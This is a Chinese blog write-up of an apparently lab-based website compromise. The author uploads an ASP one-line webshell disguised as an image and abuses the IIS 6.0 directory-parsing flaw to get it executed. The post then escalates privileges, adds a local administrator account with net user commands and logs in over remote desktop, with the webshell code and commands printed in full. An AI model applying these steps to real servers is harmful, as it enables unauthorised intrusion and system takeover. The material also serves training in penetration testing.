记录自己的第一次完整拿站

记录自己的第一次完整拿站

环境:公司内网虚拟环境

等级:基础入门工作考核

注:此处操作省略部分信息收集和其它漏洞测试步骤

如:

后门寻找:目录枚举获得

账号密码:sql注入获得

    服务器信息:sql注入获得

(一)WebShell


管理界面提供了完整的服务器信息,包含数据库文件地址


浏览后台我们发现存在大量的上传界面,所以上传漏洞变成了我们的切入点

尝试发现只支持图片类型上传

尝试一:图片马上传  

语句:

一句话asp马:<%eval request("a")%>

制作图片马:copy 2.jpg/b + 1.asp/a 1.jpg

上传结果是我们的图片马被重命名,无法正常执行



尝试二:

我们之前的信息搜集中已经发现IIS版本6.0,

这里可以联想到IIS 6.0的解析漏洞

这里简单科普:

IIS 6.0解析漏洞主要有两种:漏洞1:在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。IIS解析漏洞2:网站上传图片的时候,将网页木马文件的名字改成“*.asp;.jpg”,也同样会被 IIS 当作 asp 文件来解析并执行。例如上传一个图片文件,名字叫“vidun.asp;.jpg”的木马文件,该文件可以被当作 asp 文件解析并执行。

关于第二种解析漏洞,我们可以构造“1.asp;.jpg”文件,然而结果显而易见,文件会被重命名,并不是我们想要的asp文件。

所以我们的关注点回到第一种解析漏洞上来:

关键词:文件夹创建


我们继续后台发现,数据备份界面提供了数据库功能,而且还提供了文件夹自动创建功能

所以,新的尝试开始。


我们在图片文件夹(upfile)下创建了一个新的文件夹song.asp

然后重新进行之前的上传图片马操作,

并使用burpsuite改包修改图片马上传位置到/upfile/song.asp/下



我们可以看到是我们想要的路径,并且,文件被重名了了,不过没有关系~


接下来,掏出珍藏版过刀菜狗(手动滑稽)

注:使用被修改后的文件名连接


连接成功!


(二)提权

使用菜刀上传asp大马 / cmd命令工具 / pr 工具


借助asp马运行cmd


借助pr工具创建系统用户并提权

net user xxx 123456 /add


net localgroup administrators xxx /add


tasklist /svc


netstat -nao


使用账号密码远程登陆


注:像此处window server 2003可能会遇到服务器超出最大允许连接数的情况原因是我们平时在使用服务器操作系统的时候,往往是登录远程桌面后是直接关闭远程桌面窗口,而不是选择注销的方式来退出,那么实际上远程会话并没有释放掉,而是继续保留在服务器端,这样就会占用总的链接数。当这个数量达到最大允许值时就会出现超过远程连接会话数,从而导致其它用户无法登录到系统。

解决方式:mstsc /admin (强行注销其他用户并登陆)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 21,064评论 2 13
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,961评论 0 9
  • 为什么会存在文件上传呢? 网站为了给用户更好的体验,也有助于提高业务效率。 一般的社会网络的web应用程序,博客,...
    青山i阅读 545评论 0 0
  • 当Fall站在这块蓝色的纱染山水前被电击一样迈不开脚,又沮丧地说店家不卖时,我霸气地说,走,我去给你买,这块纱是我...
    青蘭阅读 736评论 0 1
  • 像我说的电话是别人用来我找别人的,不是别人来找我的。你说我太自私了,太以自我为中心了。其实这话说的点重了,亲人和家...
    JOBO_ba14阅读 66评论 0 0